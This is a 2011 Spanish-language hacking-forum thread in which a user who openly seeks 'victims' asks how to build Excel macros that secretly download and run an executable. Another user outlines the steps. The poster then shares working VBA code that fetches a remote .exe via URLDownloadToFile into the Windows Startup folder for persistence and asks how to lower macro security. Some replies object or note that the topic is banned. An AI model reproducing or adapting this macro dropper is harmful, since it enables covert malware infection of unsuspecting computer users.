elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Crear un Xls con macros incluidas
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Crear un Xls con macros incluidas  (Leído 4,743 veces)
yalosabes

Desconectado Desconectado

Mensajes: 87


Ver Perfil
Crear un Xls con macros incluidas
« en: 15 Marzo 2011, 17:50 pm »

HOla Foreros ;) en mi busqueda de nuevas victimas amistades, me tope con los macros de excel, los cuales permiten descargar de forma oculta un .exe archivo  ( me emociono xq no lo sabia :( )

Bueno en resumen mi duda es esta :

Se puede hacer en vb6  alguna rutina para crear un archivo .xls, ( aunque de preferencia .xla ) que contenga macros en su interior?.

Y de ser asi que pasos puedo seguir ..

pd: se lo que van a decir .. usa google.. no seas flojo.. que en el foro hay gb de informacion sobre el tema..  Sin embargo soy sincero he buskado y encontra porca informacion y de lo cual no comprendo nada.

Agradeceria su ayuda ;)


En línea

_katze_

Desconectado Desconectado

Mensajes: 140



Ver Perfil WWW
Re: Crear un Xls con macros incluidas
« Respuesta #1 en: 16 Marzo 2011, 03:17 am »

y xq no creas la macro en el excel o en el word o lo que quieras que descargue algun .exe que quieras antes de crearlo en vb6


En línea

yalosabes

Desconectado Desconectado

Mensajes: 87


Ver Perfil
Re: Crear un Xls con macros incluidas
« Respuesta #2 en: 16 Marzo 2011, 05:04 am »

Pues la idea es que, si el av detecta mi .exe, pueda aun mantenerse el archivo excel que prosiga con la infeccion
En línea

79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
Re: Crear un Xls con macros incluidas
« Respuesta #3 en: 16 Marzo 2011, 13:26 pm »

HOLA!!!

Nota: La mayoria de los usuarios standard (los que son infectables) no modifican las opciones de seguridad de macro del Office. Por ende a la victima le aparecera un cartel que dice que microsoft office ha anulado los macros por cuestion de seguridad y tu macro no funcionara a no ser que el usuario los habilite manualmente.

GRACIAS POR LEER!!!
En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
_katze_

Desconectado Desconectado

Mensajes: 140



Ver Perfil WWW
Re: Crear un Xls con macros incluidas
« Respuesta #4 en: 16 Marzo 2011, 18:32 pm »

pero puedes habilitarlas tu como potencialmente seguras....
En línea

_katze_

Desconectado Desconectado

Mensajes: 140



Ver Perfil WWW
Re: Crear un Xls con macros incluidas
« Respuesta #5 en: 16 Marzo 2011, 18:34 pm »

para mi lo que tienes que hacer es lo siguiente.

* primero crear una macro a que ellos usen y q uno de los procedimientos descargue.
* que al descargar des/comprima o en su defecto ejecute.
* si el archivo existe no realise nada y si no encuentra que realise lo anterior mencionado.
En línea

yalosabes

Desconectado Desconectado

Mensajes: 87


Ver Perfil
Re: Crear un Xls con macros incluidas
« Respuesta #6 en: 18 Marzo 2011, 00:43 am »

Este Codigo mr funciona ala perfeccion :
Código
  1. Private Declare Function GetVersion Lib "kernel32" () As Long
  2. Declare Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" _
  3.     (ByVal lpBuffer As String, nSize As Long) As Long
  4.  
  5. Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
  6.  
  7. Public Function DownloadFile(URL As String, LocalFilename As String) As Boolean
  8. Dim lngRetVal As Long
  9. lngRetVal = URLDownloadToFile(0, URL, LocalFilename, 0, 0)
  10. If lngRetVal = 0 Then DownloadFile = True
  11. End Function
  12. Public Function GetWinVersion() As String
  13. Dim Ver As Long, WinVer As Long
  14. Ver = GetVersion()
  15. WinVer = Ver And &HFFFF&
  16. GetWinVersion = Format((WinVer Mod 256) + ((WinVer \ 256) / 100), "Fixed")
  17. End Function
  18.  
  19.  
  20. Sub actualizar()
  21.     Dim lpBuff As String * 25
  22.     Dim ret As Long, UserName As String
  23.  
  24.     ret = GetUserName(lpBuff, 25)
  25.     UserName = Left(lpBuff, InStr(lpBuff, Chr(0)) - 1)
  26.  
  27. If GetWinVersion >= 4 And GetWinVersion <= 5 Then
  28. DownloadFile "http://++.exe", "c:\windows\all users\men&#250; inicio\programas\inicio\" & "++" & ".exe"
  29. End If
  30. If GetWinVersion >= 5 And GetWinVersion <= 6 Then
  31. DownloadFile "http://++.exe", "c:\documents and settings\all users\men&#250; inicio\programas\inicio\" & "++" & ".exe"
  32. End If
  33.  
  34. If GetWinVersion >= 6 And GetWinVersion <= 7 Then
  35. DownloadFile "http://++.exe", "C:\Users\" & UserName & "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" & "++" & ".exe"
  36. End If
  37. End Sub
  38.  

lo que me falta es como poner el nivel de seguridad en lo mas bajo.. alguna idea??
« Última modificación: 18 Marzo 2011, 10:32 am por raul338 » En línea

BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: Crear un Xls con macros incluidas
« Respuesta #7 en: 18 Marzo 2011, 04:50 am »

.
me recuerda este tema:

Virus Melissa o W97M/Melissa.A

Del año 1999, crees que despues de tantos años funcione tu estrategia?.

P.D.: estos temas si no mal recuerdo estan prohibidos en este sub-foro.

Temibles Lunas!¡.
En línea

The Dark Shadow is my passion.
raul338


Desconectado Desconectado

Mensajes: 2.633


La sonrisa es la mejor forma de afrontar las cosas


Ver Perfil WWW
Re: Crear un Xls con macros incluidas
« Respuesta #8 en: 18 Marzo 2011, 10:36 am »

lo que me falta es como poner el nivel de seguridad en lo mas bajo.. alguna idea??

Eso ya no depende de nosotros :xD
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
hay una funcion de Macros en VB
Programación Visual Basic
L0B0_BL@NC0 1 1,301 Último mensaje 17 Noviembre 2005, 04:16 am
por Slasher-K
macros ?????????
Programación Visual Basic
xato 1 1,493 Último mensaje 27 Diciembre 2006, 21:35 pm
por CeLaYa
[Guía oficial] Crear Servidor Privado Rakion [Herramientas Incluidas]
Desarrollo Web
Weeken 0 7,261 Último mensaje 30 Mayo 2012, 06:44 am
por Weeken
Generar Jar con librerias incluidas
Java
BigBear 0 1,374 Último mensaje 26 Febrero 2014, 21:57 pm
por BigBear
paginas incluidas no funcionan correctamente « 1 2 3 »
PHP
gAb1 25 8,791 Último mensaje 1 Octubre 2014, 04:04 am
por gAb1
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines